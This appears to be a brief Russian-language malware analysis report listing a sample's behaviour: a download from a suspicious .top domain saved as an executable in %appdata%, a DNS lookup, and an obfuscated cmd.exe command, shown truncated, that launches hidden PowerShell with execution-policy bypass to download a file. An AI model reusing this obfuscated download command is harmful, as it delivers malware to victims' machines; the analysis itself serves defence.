Техническая информация
- http://cometogod.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^w^Ershe^l^L.eX^e ^-^ex^EcuTIOn^p^oL^Ic^Y ^b^Yp^As^S ^-n^op^RO^F^iL^e -W^I^N^dO^wS^Ty^le^ hi^dDEN^ (new^-^objeCt^ sy^stEm^.n^et.^wEbCL^IEnt)^.^DO^wN^lOadf^il^e^(^'http://cometogod.to...
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /C "po^w^Ershe^l^L.eX^e ^-^ex^EcuTIOn^p^oL^Ic^Y ^b^Yp^As^S ^-n^op^RO^F^iL^e -W^I^N^dO^wS^Ty^le^ hi^dDEN^ (new^-^objeCt^ sy^stEm^.n^et.^wEbCL^IEnt)^.^DO^wN^lOadf^il^e^(^'http://cometogod.to...' (со скрытым окном)